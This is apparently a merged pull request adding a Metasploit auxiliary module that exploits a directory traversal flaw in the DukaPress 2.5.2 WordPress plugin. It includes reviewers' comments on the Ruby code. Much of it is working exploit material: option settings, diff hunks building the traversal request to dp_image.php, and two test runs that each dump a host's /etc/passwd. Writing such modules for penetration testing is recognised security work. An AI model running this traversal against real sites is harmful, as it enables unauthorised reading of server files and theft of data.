### PR TITLE
Add WordPress Dukapress File Read Vulnerability

### PR DESCRIPTION
**Pull request by espreto**
#### Add Wordpress Plugin DukaPress File Read Vulnerability.

  Application: Wordpress Plugin "DukaPress" 2.5.2
  Homepage: https://wordpress.org/plugins/dukapress/download/
  Source Code: https://downloads.wordpress.org/plugin/dukapress.2.5.2.zip
  Active Installs (wordpress.org): 900+
#### Vulnerable packages*

  2.5.2
##### Linux (Ubuntu 12.04.5 LTS):

```
msf > use auxiliary/scanner/http/wp_dukapress_file_read 
msf auxiliary(wp_dukapress_file_read) > show options 

Module options (auxiliary/scanner/http/wp_dukapress_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /etc/passwd      yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(wp_dukapress_file_read) > info

       Name: WordPress DukaPress Plugin File Read Vulnerability
     Module: auxiliary/scanner/http/wp_dukapress_file_read
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Kacper Szurek
  Roberto Soares Espreto <robertoespreto@gmail.com>

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DEPTH      6                yes       Traversal Depth (to reach the root folder)
  FILEPATH   /etc/passwd      yes       The path to the file to read
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal vulnerability in 
  WordPress Plugin "DukaPress" version 2.5.2, allowing to read 
  arbitrary files with the web server privileges.

References:
  http://www.exploit-db.com/exploits/35346
  http://cvedetails.com/cve/2014-8799/
  https://wpvulndb.com/vulnerabilities/7731
  http://www.osvdb.org/115130

msf auxiliary(wp_dukapress_file_read) > set RHOSTS 192.168.0.15
RHOSTS => 192.168.0.15
msf auxiliary(wp_dukapress_file_read) > run

[*] Downloading file...

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
colord:x:103:108:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:104:111:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:105:114::/nonexistent:/bin/false
avahi-autoipd:x:106:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:107:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
usbmux:x:108:46:usbmux daemon,,,:/home/usbmux:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:122:RealtimeKit,,,:/proc:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
saned:x:114:123::/home/saned:/bin/false
espreto:x:1000:1000:espreto,,,:/home/espreto:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
postgres:x:115:125:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:116:126:MySQL Server,,,:/nonexistent:/bin/false

[+] 192.168.0.15:80 - File saved in: /home/espreto/.msf4/loot/20150416070713_default_192.168.0.15_mobileedition.tr_315159.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wp_dukapress_file_read) > 

```

### CODE REVIEW

File: modules/auxiliary/scanner/http/wp_dukapress_file_read.rb [hunk 1]
```diff
@@ -0,0 +1,81 @@
...
+      'uri'    => normalize_uri(wordpress_url_plugins, 'dukapress', 'lib', 'dp_image.php'),
+      'vars_get' =>
+        {
+          'src' => "#{traversal}#{filename}"
+        }
+    })
+
+    if res &&
+        res.code == 200 &&
+        res.body.length > 0
```
Comment (void-in) [inline modules/auxiliary/scanner/http/wp_dukapress_file_read.rb]: Should be on a single line to be consistent with other modules' code:
```ruby
if res && res.code == 200 && res.body.length > 0
```

Comment (espreto) [inline modules/auxiliary/scanner/http/wp_dukapress_file_read.rb]: @void-in tks for the tip! Changed. :)

File: modules/auxiliary/scanner/http/wp_dukapress_file_read.rb [hunk 2]
```diff
@@ -0,0 +1,79 @@
...
+
+    if res && res.code == 200 && res.body.length > 0
+
+      print_status('Downloading file...')
+      print_line("\n#{res.body}")
+
+      fname = datastore['FILEPATH']
+
+      path = store_loot(
+        'mobileedition.traversal',
```
Comment (FireFart) [inline modules/auxiliary/scanner/http/wp_dukapress_file_read.rb]: wrong loot name

File: modules/auxiliary/scanner/http/wp_dukapress_file_read.rb [hunk 3]
```diff
@@ -0,0 +1,79 @@
...
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 6 ])
+      ], self.class)
+  end
+
```
Comment (FireFart) [inline modules/auxiliary/scanner/http/wp_dukapress_file_read.rb]: we can use the check function here:
http://plugins.svn.wordpress.org/dukapress/trunk/readme.txt

File: modules/auxiliary/scanner/http/wp_dukapress_file_read.rb [hunk 4]
```diff
@@ -0,0 +1,79 @@
...
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
```
Comment (FireFart) [inline modules/auxiliary/scanner/http/wp_dukapress_file_read.rb]: this include is not necessary

File: modules/auxiliary/scanner/http/wp_dukapress_file_read.rb [hunk 5]
```diff
@@ -0,0 +1,81 @@
...
+          'Kacper Szurek', # Vulnerability discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 6 ])
```
Comment (FireFart) [inline modules/auxiliary/scanner/http/wp_dukapress_file_read.rb]: as in the other module, can we raise this default value?

File: modules/auxiliary/scanner/http/wp_dukapress_file_read.rb [hunk 6]
```diff
@@ -0,0 +1,81 @@
...
+        'dukapress.file',
+        'text/plain',
+        ip,
+        res.body,
+        fname
+      )
+
+      print_good("#{peer} - File saved in: #{path}")
+    else
+      print_error("#{peer} - Nothing was downloaded")
```
Comment (FireFart) [inline modules/auxiliary/scanner/http/wp_dukapress_file_read.rb]: `print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter")`

**Comment by FireFart** [comment]
typo in check method, will fix during merge.

Test:
```
msf auxiliary(wp_dukapress_file_read) > check
[*] 10.211.55.4:80 - The target appears to be vulnerable.
[*] Checked 1 of 1 hosts (100% complete)
msf auxiliary(wp_dukapress_file_read) > run

[*] Downloading file...

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
firefart:x:1000:1000:firefart,,,:/home/firefart:/bin/bash
mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false
elasticsearch:x:106:114::/usr/share/elasticsearch:/bin/false

[+] 10.211.55.4:80 - File saved in: /Users/firefart/.msf4/loot/20150417111914_default_10.211.55.4_dukapress.file_673037.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wp_dukapress_file_read) >
```

**Pull request merged**